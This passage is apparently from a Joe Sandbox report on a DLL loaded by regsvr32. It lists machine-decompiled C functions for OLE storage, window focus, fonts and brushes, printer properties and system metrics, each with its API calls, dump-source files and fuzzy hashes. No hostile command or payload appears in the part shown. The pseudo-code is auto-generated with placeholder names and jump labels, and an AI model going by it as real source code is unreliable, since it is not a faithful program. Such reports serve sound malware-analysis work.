                                                                                                                									 *(_t224 - 0x10) = _t159;
                                                                                                                									E1002001A(0, _t224 - 0x74, _t224 - 0x2c, _t219, _t222,  *_t47);
                                                                                                                								} else {
                                                                                                                									_t161 =  *(_t224 + 8);
                                                                                                                									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t161 + 0x20))(_t161);
                                                                                                                								}
                                                                                                                								_t129 =  *(_t224 + 8);
                                                                                                                								goto L38;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						if( *(_t224 + 0x10) != 0) {
                                                                                                                							goto L16;
                                                                                                                						}
                                                                                                                						_t163 =  *_t219;
                                                                                                                						_push(_t224 + 0x14);
                                                                                                                						_push(0x1005fb44);
                                                                                                                						_push(_t163);
                                                                                                                						if( *((intOrPtr*)( *_t163))() < 0) {
                                                                                                                							goto L11;
                                                                                                                						}
                                                                                                                						_push(0);
                                                                                                                						_push(0);
                                                                                                                						_push(0);
                                                                                                                						_push(3);
                                                                                                                						if( *((intOrPtr*)( *_t222 + 0x50))() == 0) {
                                                                                                                							goto L11;
                                                                                                                						} else {
                                                                                                                							 *(_t224 + 0x10) = 0;
                                                                                                                							_t168 =  *((intOrPtr*)( *_t222 + 0x50))(0, 0xffffffff, _t224 + 0x10, _t224 + 0xc);
                                                                                                                							_t206 =  *((intOrPtr*)(_t224 + 0x14));
                                                                                                                							 *(_t224 - 0x10) =  *((intOrPtr*)( *_t206 + 0x14))(_t206,  *(_t224 + 0x10), _t168);
                                                                                                                							_t170 =  *((intOrPtr*)(_t224 + 0x14));
                                                                                                                							 *((intOrPtr*)( *_t170 + 8))(_t170);
                                                                                                                							 *((intOrPtr*)(_t224 + 0x14)) = 0;
                                                                                                                							goto L39;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t172 =  *_t219;
                                                                                                                					 *((intOrPtr*)( *_t172 + 0x58))(_t172, 1, _t221 + 0x70);
                                                                                                                					if(( *(_t221 + 0x70) & 0x00020000) == 0) {
                                                                                                                						goto L5;
                                                                                                                					}
                                                                                                                					_t174 =  *_t219;
                                                                                                                					_t175 =  *((intOrPtr*)( *_t174 + 0xc))(_t174, _t221 + 0xc8);
                                                                                                                					 *(_t224 - 0x10) = _t175;
                                                                                                                					if(_t175 < 0) {
                                                                                                                						goto L44;
                                                                                                                					}
                                                                                                                					goto L5;
                                                                                                                				}
                                                                                                                				_t122 = E1002E9D9(_t114, __ecx,  *(_t224 + 8), 0, 3, 0x1005fa54, _t219,  *((intOrPtr*)(_t224 + 0x14)));
                                                                                                                				 *(_t224 - 0x10) = _t122;
                                                                                                                				if(_t122 < 0) {
                                                                                                                					goto L52;
                                                                                                                				}
                                                                                                                				goto L2;
                                                                                                                			}











































                                                                                                                0x00000000
                                                                                                                0x100304c5
                                                                                                                0x10030498
                                                                                                                0x1003049b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003049b
                                                                                                                0x10030427
                                                                                                                0x1003042e
                                                                                                                0x10030431
                                                                                                                0x10030437
                                                                                                                0x10030439
                                                                                                                0x1003043c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10030442
                                                                                                                0x1003044f
                                                                                                                0x10030452
                                                                                                                0x10030458
                                                                                                                0x1003045a
                                                                                                                0x1003045d
                                                                                                                0x1003045f
                                                                                                                0x1003046b
                                                                                                                0x1003046e
                                                                                                                0x10030474
                                                                                                                0x10030474
                                                                                                                0x10030477
                                                                                                                0x00000000
                                                                                                                0x10030477
                                                                                                                0x100303a1
                                                                                                                0x100303a1
                                                                                                                0x100303a5
                                                                                                                0x100303af
                                                                                                                0x100303b1
                                                                                                                0x100303b3
                                                                                                                0x00000000
                                                                                                                0x100303b5
                                                                                                                0x100303b5
                                                                                                                0x100303b7
                                                                                                                0x100303d3
                                                                                                                0x100303df
                                                                                                                0x100303e2
                                                                                                                0x100303e7
                                                                                                                0x100303f1
                                                                                                                0x100303f4
                                                                                                                0x100303f4
                                                                                                                0x100303f4
                                                                                                                0x100303fb
                                                                                                                0x100303fe
                                                                                                                0x100303b9
                                                                                                                0x100303b9
                                                                                                                0x100303c2
                                                                                                                0x100303c2
                                                                                                                0x10030403
                                                                                                                0x00000000
                                                                                                                0x10030403
                                                                                                                0x100303b3
                                                                                                                0x1003033c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10030342
                                                                                                                0x10030349
                                                                                                                0x1003034a
                                                                                                                0x1003034f
                                                                                                                0x10030354
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10030358
                                                                                                                0x10030359
                                                                                                                0x1003035a
                                                                                                                0x1003035b
                                                                                                                0x10030364
                                                                                                                0x00000000
                                                                                                                0x10030366
                                                                                                                0x10030375
                                                                                                                0x10030378
                                                                                                                0x1003037b
                                                                                                                0x10030388
                                                                                                                0x1003038b
                                                                                                                0x10030391
                                                                                                                0x10030394
                                                                                                                0x00000000
                                                                                                                0x10030394
                                                                                                                0x10030364
                                                                                                                0x10030301
                                                                                                                0x1003030c
                                                                                                                0x10030316
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10030318
                                                                                                                0x10030324
                                                                                                                0x10030329
                                                                                                                0x1003032c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003032c
                                                                                                                0x100302cc
                                                                                                                0x100302d3
                                                                                                                0x100302d6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 100302A7
                                                                                                                  • Part of subcall function 1002E9D9: SysStringLen.OLEAUT32(?), ref: 1002E9E1
                                                                                                                  • Part of subcall function 1002E9D9: CoGetClassObject.OLE32(?,?,00000000,1005F984,?), ref: 1002E9FF
                                                                                                                • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10030431
                                                                                                                • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10030452
                                                                                                                • GlobalAlloc.KERNEL32(00000000,00000000), ref: 1003049F
                                                                                                                • GlobalLock.KERNEL32 ref: 100304AD
                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 100304C5
                                                                                                                • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 100304E8
                                                                                                                • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10030504
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 317715441-0
                                                                                                                • Opcode ID: 60c1ff899a70c2082574f0bf6dfbe2f6096368b3e89200d94ea2070098720afc
                                                                                                                • Instruction ID: 2c725d1e2788cf00e1291c633ca5e0efe4e8062dfd95c9fc4e137c500c7b4efa
                                                                                                                • Opcode Fuzzy Hash: 60c1ff899a70c2082574f0bf6dfbe2f6096368b3e89200d94ea2070098720afc
                                                                                                                • Instruction Fuzzy Hash: 1CC1E3B0A0124AEFDB01CFA4C8989AEBBB9FF48345F504969F915EB251C771DA41CF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E1002BB83(intOrPtr* __ecx, void* __edi, void* __eflags) {
                                                                                                                				intOrPtr _v4;
                                                                                                                				intOrPtr _v8;
                                                                                                                				struct HWND__* _v12;
                                                                                                                				int _v16;
                                                                                                                				int _v24;
                                                                                                                				void* __ebx;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				struct HWND__* _t41;
                                                                                                                				intOrPtr _t42;
                                                                                                                				intOrPtr _t43;
                                                                                                                				struct HWND__* _t45;
                                                                                                                				void* _t48;
                                                                                                                				void* _t68;
                                                                                                                				void* _t70;
                                                                                                                				void* _t72;
                                                                                                                				void* _t83;
                                                                                                                				struct HWND__* _t84;
                                                                                                                				intOrPtr* _t86;
                                                                                                                
                                                                                                                				_t89 = __eflags;
                                                                                                                				_t83 = __edi;
                                                                                                                				_t86 = __ecx;
                                                                                                                				E1001C7A2(_t68, __ecx, __edi, __ecx, __eflags, 0x10);
                                                                                                                				E1001C7A2(_t68, __ecx, __edi, __ecx, _t89, 0x7c000);
                                                                                                                				 *((intOrPtr*)( *__ecx + 0x140))();
                                                                                                                				_t41 =  *((intOrPtr*)(E10023187(_t68, __edi, __ecx, _t89) + 4));
                                                                                                                				_v12 = _t41;
                                                                                                                				if(_t41 != 0) {
                                                                                                                					E100216B4(_t41, 0);
                                                                                                                				}
                                                                                                                				_t42 =  *((intOrPtr*)(_t86 + 0xa0));
                                                                                                                				if(_t42 != 0) {
                                                                                                                					_t43 =  *((intOrPtr*)(_t42 + 0x20));
                                                                                                                				} else {
                                                                                                                					_t43 = 0;
                                                                                                                				}
                                                                                                                				_push(_t83);
                                                                                                                				_t75 =  &_v12;
                                                                                                                				_t84 = E10021616(_t43,  &_v12);
                                                                                                                				 *(_t86 + 0x5c) = _t84;
                                                                                                                				_v24 = 0;
                                                                                                                				if(_t84 != 0 && IsWindowEnabled(_t84) != 0) {
                                                                                                                					EnableWindow(_t84, 0);
                                                                                                                					_v16 = 1;
                                                                                                                				}
                                                                                                                				_t45 = GetCapture();
                                                                                                                				_t94 = _t45;
                                                                                                                				if(_t45 != 0) {
                                                                                                                					SendMessageA(_t45, 0x1f, 0, 0);
                                                                                                                				}
                                                                                                                				 *(_t86 + 0x3c) =  *(_t86 + 0x3c) | 0x00000010;
                                                                                                                				 *((intOrPtr*)(_t86 + 0x44)) = 0;
                                                                                                                				E1001B7F6(_t84, _t94, _t86);
                                                                                                                				 *(_t86 + 0x58) =  *(_t86 + 0x58) | 0x00000400;
                                                                                                                				 *(_t86 + 0x3c) =  *(_t86 + 0x3c) | 0x00000010;
                                                                                                                				_t48 = E1002BB36(_t75, _t86 + 0x54);
                                                                                                                				 *(_t86 + 0x58) =  *(_t86 + 0x58) & 0xfffffbff;
                                                                                                                				_t70 = _t48;
                                                                                                                				E10019CBE(_t70, _t84, _t94);
                                                                                                                				if(_t70 == 0 || _t70 == 0xffffffff) {
                                                                                                                					 *(_t86 + 0x3c) =  *(_t86 + 0x3c) & 0xffffffef;
                                                                                                                				}
                                                                                                                				_v8 =  *((intOrPtr*)(_t86 + 0x44));
                                                                                                                				if( *((intOrPtr*)( *_t86 + 0x80))() != 0) {
                                                                                                                					_t72 = 4;
                                                                                                                					if((E1001D23C(_t86) & 0x00000100) != 0) {
                                                                                                                						_t72 = 5;
                                                                                                                					}
                                                                                                                					_v12 = E100197B9(_t86, _t72);
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t86 + 0x20)) != 0) {
                                                                                                                					E1001D569(_t86, 0, 0, 0, 0, 0, 0x97);
                                                                                                                				}
                                                                                                                				if(_v16 != 0) {
                                                                                                                					EnableWindow(_t84, 1);
                                                                                                                				}
                                                                                                                				if(_t84 != 0 && GetActiveWindow() ==  *((intOrPtr*)(_t86 + 0x20))) {
                                                                                                                					SetActiveWindow(_t84);
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)( *_t86 + 0x60))();
                                                                                                                				_t78 = _v4;
                                                                                                                				if(_v4 != 0) {
                                                                                                                					E100216B4(_t78, 1);
                                                                                                                				}
                                                                                                                				if(_v12 != 0) {
                                                                                                                					EnableWindow(_v12, 1);
                                                                                                                				}
                                                                                                                				return _v8;
                                                                                                                			}























                                                                                                                APIs
                                                                                                                  • Part of subcall function 1001C7A2: _memset.LIBCMT ref: 1001C7D0
                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 1002BBF1
                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 1002BBFD
                                                                                                                • GetCapture.USER32 ref: 1002BC07
                                                                                                                • SendMessageA.USER32 ref: 1002BC16
                                                                                                                • EnableWindow.USER32(00000000,00000001), ref: 1002BCAD
                                                                                                                • GetActiveWindow.USER32 ref: 1002BCB3
                                                                                                                • SetActiveWindow.USER32(00000000), ref: 1002BCBF
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 1002BCE8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Enable$Active$CaptureEnabledMessageSend_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 228322376-0
                                                                                                                • Opcode ID: de6d394cd87c638cc59b3f739f4485a6814f58672fbccdada37cedf09c286cc8
                                                                                                                • Instruction ID: 2c30a4868acd2c0dc7ff9dd73bbc77e2702fccf8ca6efbfdc9b0e17fcf5f407a
                                                                                                                • Opcode Fuzzy Hash: de6d394cd87c638cc59b3f739f4485a6814f58672fbccdada37cedf09c286cc8
                                                                                                                • Instruction Fuzzy Hash: CB41E174200B019FD710EF68DDC9A6EBBE8FF48750F90092DF28697292CBB4EC448A51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E10021E1F(void* __eflags) {
                                                                                                                				intOrPtr _v4;
                                                                                                                				struct HWND__* _v8;
                                                                                                                				void* __ebx;
                                                                                                                				void* __ecx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				int _t30;
                                                                                                                				struct HWND__* _t33;
                                                                                                                				intOrPtr _t36;
                                                                                                                				intOrPtr _t40;
                                                                                                                				int _t41;
                                                                                                                				intOrPtr _t43;
                                                                                                                				void* _t44;
                                                                                                                				void* _t52;
                                                                                                                				signed int _t54;
                                                                                                                				void* _t62;
                                                                                                                				void* _t64;
                                                                                                                				signed int _t67;
                                                                                                                				void* _t74;
                                                                                                                
                                                                                                                				_t74 = __eflags;
                                                                                                                				_t67 = _t54;
                                                                                                                				_push(_t62);
                                                                                                                				_t30 = lstrlenA( *( *((intOrPtr*)(_t67 + 0x74)) + 0x1c));
                                                                                                                				_t52 = 0;
                                                                                                                				E1003BB70(_t62,  &(( *( *((intOrPtr*)(_t67 + 0x74)) + 0x1c))[_t30 + 1]), 0,  *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x74)) + 0x20)) - _t30 + 1);
                                                                                                                				_t33 = GetFocus();
                                                                                                                				_t63 =  *((intOrPtr*)(_t67 + 0x74));
                                                                                                                				_t58 = _t67;
                                                                                                                				_v8 = _t33;
                                                                                                                				 *( *((intOrPtr*)(_t67 + 0x74)) + 4) = E10020E9D(0, _t67, _t74);
                                                                                                                				E10019CBE(0,  *((intOrPtr*)(_t67 + 0x74)), _t74);
                                                                                                                				_t36 =  *((intOrPtr*)(_t67 + 0x74));
                                                                                                                				if( *(_t36 + 4) != 0 && IsWindowEnabled( *(_t36 + 4)) != 0) {
                                                                                                                					_t52 = 1;
                                                                                                                					EnableWindow( *( *((intOrPtr*)(_t67 + 0x74)) + 4), 0);
                                                                                                                				}
                                                                                                                				_t64 = E10022C52(_t52, _t63, _t67, 1);
                                                                                                                				if(( *( *((intOrPtr*)(_t67 + 0x74)) + 0x34) & 0x00080000) == 0) {
                                                                                                                					E1001B7F6(_t64, __eflags, _t67);
                                                                                                                				} else {
                                                                                                                					 *(_t64 + 0x18) = _t67;
                                                                                                                				}
                                                                                                                				_push( *((intOrPtr*)(_t67 + 0x74)));
                                                                                                                				if( *((intOrPtr*)(_t67 + 0x78)) == 0) {
                                                                                                                					_t40 = E10021E08(_t58);
                                                                                                                				} else {
                                                                                                                					_t40 = E10021DF1(_t58);
                                                                                                                				}
                                                                                                                				 *(_t64 + 0x18) =  *(_t64 + 0x18) & 0x00000000;
                                                                                                                				_v4 = _t40;
                                                                                                                				if(_t52 != 0) {
                                                                                                                					EnableWindow( *( *((intOrPtr*)(_t67 + 0x74)) + 4), 1);
                                                                                                                				}
                                                                                                                				_t41 = IsWindow(_v8);
                                                                                                                				_t81 = _t41;
                                                                                                                				if(_t41 != 0) {
                                                                                                                					SetFocus(_v8);
                                                                                                                				}
                                                                                                                				E10020ED7(_t52, _t67, _t64, _t67, _t81);
                                                                                                                				_t43 = _v4;
                                                                                                                				if(_t43 == 0) {
                                                                                                                					_t44 = 2;
                                                                                                                					return _t44;
                                                                                                                				}
                                                                                                                				return _t43;
                                                                                                                			}
























                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,100035EC,00000001,10056FBC,00000000,00000004,FILE(*.txt)|*.txt||,00000000,00000000,DF7C0CDA), ref: 10021E2D
                                                                                                                • _memset.LIBCMT ref: 10021E46
                                                                                                                • GetFocus.USER32 ref: 10021E4E
                                                                                                                • IsWindowEnabled.USER32(?), ref: 10021E7B
                                                                                                                • EnableWindow.USER32(?,00000000), ref: 10021E8E
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 10021ED7
                                                                                                                • IsWindow.USER32(?), ref: 10021EDD
                                                                                                                • SetFocus.USER32 ref: 10021EEB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnableFocus$Enabled_memsetlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2950697994-0
                                                                                                                • Opcode ID: 34e488af097f25fa4a4901a76bb1c42e2241d7697c5ad10cd033a353b989e6c5
                                                                                                                • Instruction ID: 3b5bad7034ca4c5e966a79ba62dc1560c0fbabe954891b0be745d6764cf37ffe
                                                                                                                • Opcode Fuzzy Hash: 34e488af097f25fa4a4901a76bb1c42e2241d7697c5ad10cd033a353b989e6c5
                                                                                                                • Instruction Fuzzy Hash: 29218D38200B009FEB11DF20ED89A6ABBE9FF58741F524A2DF95687661DB71F801CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E10005610(void* __edx, void* __eflags) {
                                                                                                                				char _v4;
                                                                                                                				char _v12;
                                                                                                                				intOrPtr* _v16;
                                                                                                                				intOrPtr _v44;
                                                                                                                				void* __ecx;
                                                                                                                				void* __edi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t23;
                                                                                                                				intOrPtr* _t27;
                                                                                                                				struct HBRUSH__* _t33;
                                                                                                                				intOrPtr* _t43;
                                                                                                                				intOrPtr* _t45;
                                                                                                                				intOrPtr* _t59;
                                                                                                                				LOGFONTA* _t62;
                                                                                                                				signed int _t64;
                                                                                                                				intOrPtr* _t67;
                                                                                                                
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E100511C4);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_push(_t45);
                                                                                                                				_t23 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_push(_t23 ^ _t64);
                                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                                				_t59 = _t45;
                                                                                                                				_v16 = _t59;
                                                                                                                				E10018895(_t45, __eflags);
                                                                                                                				_t43 = _t59 + 0x9c;
                                                                                                                				 *_t59 = 0x1005734c;
                                                                                                                				_v4 = 0;
                                                                                                                				 *((intOrPtr*)(_t43 + 4)) = 0;
                                                                                                                				 *_t43 = 0x100572d4;
                                                                                                                				_v4 = 1;
                                                                                                                				_t27 = E100173A6();
                                                                                                                				_t67 = _t27;
                                                                                                                				_t47 = 0 | _t67 == 0x00000000;
                                                                                                                				if(_t67 == 0) {
                                                                                                                					_t27 = E10001000(_t47, __edx, 0x80004005);
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t59 + 0xa4)) =  *((intOrPtr*)( *((intOrPtr*)( *_t27 + 0xc))))() + 0x10;
                                                                                                                				_v4 = 2;
                                                                                                                				 *((intOrPtr*)(_t59 + 0x54)) = GetSysColor(8);
                                                                                                                				_t33 = CreateSolidBrush(GetSysColor(0xf));
                                                                                                                				_t62 = _t59 + 0x60;
                                                                                                                				 *(_t59 + 0x58) = _t33;
                                                                                                                				GetObjectA(GetStockObject(0x11), 0x3c, _t62);
                                                                                                                				E100247F5(_t43, GetSysColor, _t62, CreateFontIndirectA(_t62));
                                                                                                                				 *((intOrPtr*)(_t59 + 0xac)) = 0;
                                                                                                                				 *((intOrPtr*)(_t59 + 0xa8)) = 0;
                                                                                                                				 *((intOrPtr*)(_t59 + 0xb0)) = 1;
                                                                                                                				 *((intOrPtr*)(_t59 + 0xb8)) = 0;
                                                                                                                				 *((intOrPtr*)(_t59 + 0xb4)) = 0;
                                                                                                                				 *((intOrPtr*)(_t59 + 0x5c)) = CreateSolidBrush(GetSysColor(0xf));
                                                                                                                				 *[fs:0x0] = _v44;
                                                                                                                				return _t59;
                                                                                                                			}




















                                                                                                                APIs
                                                                                                                • GetSysColor.USER32 ref: 10005699
                                                                                                                • GetSysColor.USER32 ref: 100056A0
                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 100056A3
                                                                                                                • GetStockObject.GDI32(00000011), ref: 100056B4
                                                                                                                • GetObjectA.GDI32(00000000,?,?), ref: 100056BB
                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 100056C2
                                                                                                                • GetSysColor.USER32 ref: 100056F6
                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 100056F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ColorCreate$BrushObjectSolid$FontIndirectStock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2423990618-0
                                                                                                                • Opcode ID: aff33c15df814b6b40dfe8f69a7c5e60c5347ae22f5931d02fdc0e963ca0e209
                                                                                                                • Instruction ID: decd84fa81e68265d5d06a575d2a90eabd31cf79224aca9c57f36db87637f21d
                                                                                                                • Opcode Fuzzy Hash: aff33c15df814b6b40dfe8f69a7c5e60c5347ae22f5931d02fdc0e963ca0e209
                                                                                                                • Instruction Fuzzy Hash: 9E31AEB15047409FE760DF74CC44B9BBBE8FF88310F01492DE59ACB291DB79A4448B21
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E10025795(void* __ecx, char* _a4) {
                                                                                                                				void* _v8;
                                                                                                                				void* _t15;
                                                                                                                				void* _t20;
                                                                                                                				void* _t35;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t35 = __ecx;
                                                                                                                				_t15 =  *(__ecx + 0x74);
                                                                                                                				if(_t15 != 0) {
                                                                                                                					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
                                                                                                                					if(_t15 == 0) {
                                                                                                                						_t15 = OpenPrinterA(_a4,  &_v8, 0);
                                                                                                                						if(_t15 != 0) {
                                                                                                                							_t18 =  *(_t35 + 0x70);
                                                                                                                							if( *(_t35 + 0x70) != 0) {
                                                                                                                								E1002D808(_t18);
                                                                                                                							}
                                                                                                                							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
                                                                                                                							 *(_t35 + 0x70) = _t20;
                                                                                                                							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
                                                                                                                								E1002D808( *(_t35 + 0x70));
                                                                                                                								 *(_t35 + 0x70) = 0;
                                                                                                                							}
                                                                                                                							_t15 = ClosePrinter(_v8);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t15;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • GlobalLock.KERNEL32 ref: 100257B2
                                                                                                                • lstrcmpA.KERNEL32(?,?), ref: 100257BE
                                                                                                                • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 100257D0
                                                                                                                • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 100257F0
                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 100257F8
                                                                                                                • GlobalLock.KERNEL32 ref: 10025802
                                                                                                                • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1002580F
                                                                                                                • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10025827
                                                                                                                  • Part of subcall function 1002D808: GlobalFlags.KERNEL32(?), ref: 1002D813
                                                                                                                  • Part of subcall function 1002D808: GlobalUnlock.KERNEL32(?,?,00000000,10025821,?,00000000,?,?,00000000,00000000,00000002), ref: 1002D825
                                                                                                                  • Part of subcall function 1002D808: GlobalFree.KERNEL32(?), ref: 1002D830
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 168474834-0
                                                                                                                • Opcode ID: 0f1d27c23d3555b47a502b77b6e162dc62b27fc45dd4ef8bd25957cff7948110
                                                                                                                • Instruction ID: ae63f95331d801131bf0f4906f7ef04ccb0b106fa2c9e0002886c8131a7a42df
                                                                                                                • Opcode Fuzzy Hash: 0f1d27c23d3555b47a502b77b6e162dc62b27fc45dd4ef8bd25957cff7948110
                                                                                                                • Instruction Fuzzy Hash: 1A11A0B5500604BBDB12EBB5EC89C6F7EFDFB89740B404019FA06D2021DA76ED40DB64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1002D07D(void* __ecx) {
                                                                                                                				struct HDC__* _t18;
                                                                                                                				void* _t19;
                                                                                                                
                                                                                                                				_t19 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
                                                                                                                				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
                                                                                                                				 *0x10070c70 = GetSystemMetrics(2) + 1;
                                                                                                                				 *0x10070c74 = GetSystemMetrics(3) + 1;
                                                                                                                				_t18 = GetDC(0);
                                                                                                                				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
                                                                                                                				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
                                                                                                                				return ReleaseDC(0, _t18);
                                                                                                                			}






                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 1002D08A
                                                                                                                • GetSystemMetrics.USER32 ref: 1002D091
                                                                                                                • GetSystemMetrics.USER32 ref: 1002D098
                                                                                                                • GetSystemMetrics.USER32 ref: 1002D0A2
